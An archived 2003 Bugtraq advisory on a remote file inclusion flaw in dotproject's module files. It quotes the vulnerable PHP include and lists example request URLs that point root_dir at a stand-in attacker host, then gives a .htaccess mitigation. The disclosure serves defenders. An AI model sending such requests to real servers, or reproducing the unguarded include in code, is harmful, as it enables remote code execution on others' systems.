A non-official patch has been created for this hole and is published on http://www.phpsecure.org/index.php?zone=pPatchA&sAlpha=d&l=us (english version) . >From: mindwarperat_private >To: bugtraqat_private >Subject: dotproject Remote Code Execution Vulnerability >Date: Wed, 29 Jan 2003 04:02:24 -0800 > >dotproject Remote Code Execution Vulnerability (By Mindwarper) > ><------- -------> > >---------------------- >Vendor Information: >---------------------- > >Homepage : http://www.dotproject.net >Vendor : informed >Mailed advisory: 28/01/03 >Vender Response : None > > >---------------------- >Affected Versions: >---------------------- > >dev20030121 > > >---------------------- >Vulnerability: >---------------------- > > >dotproject is a PHP+MySQL beta level web based project management and >tracking tool >that dotmarketing started in Dec. 2000. >Inside the directory /modules/ multiple files try to include >classdefs/date.php >without defining $root_dir first and allow remote attackers to inject their >own >servers if globals are set on. > >Example Code from modules/projects/addedit.php: > >****** > ><?php >## >## Files modules: index page re-usable sub-table >## > >require_once( "$root_dir/classdefs/date.php" ); >$df = $AppUI->getPref('SHDATEFORMAT'); >$tf = $AppUI->getPref('TIMEFORMAT'); > >****** > >As you can see nothing happens before the require_once function is called >and therefore >with globals set on an attacker may include remote files. > >Example: > >http://victim/dotproject/modules/files/index_table.php?root_dir=http://attacker > >this works also on > >http://victim/dotproject/modules/projects/addedit.php?root_dir=http://attacker >http://victim/dotproject/modules/projects/view.php?root_dir=http://attacker >http://victim/dotproject/modules/projects/vw_files.php?root_dir=http://attacker >http://victim/dotproject/modules/tasks/addedit.php?root_dir=http://attacker >http://victim/dotproject/modules/tasks/viewgantt.php?root_dir=http://attacker > > >---------------------- >Solution: >---------------------- > >Please check the vendor's website for new patches. > >As a temporary solution, create a .htaccess file that contains 'Deny from >all'. >Place it in the /modules/ directory and that should block remote users from >accessing it. > > >---------------------- >Contact: >---------------------- > >Name: Mindwarper >Email: mindwarperat_private >Website: http://mindlock.bestweb.net > > ><------- -------> > > > > >Concerned about your privacy? Follow this link to get >FREE encrypted email: https://www.hushmail.com/?l=2 > >Big $$$ to be made with the HushMail Affiliate Program: >https://www.hushmail.com/about.php?subloc=affiliate&l=427 _________________________________________________________________
This archive was generated by hypermail 2b30 : Wed Jan 29 2003 - 09:43:20 PST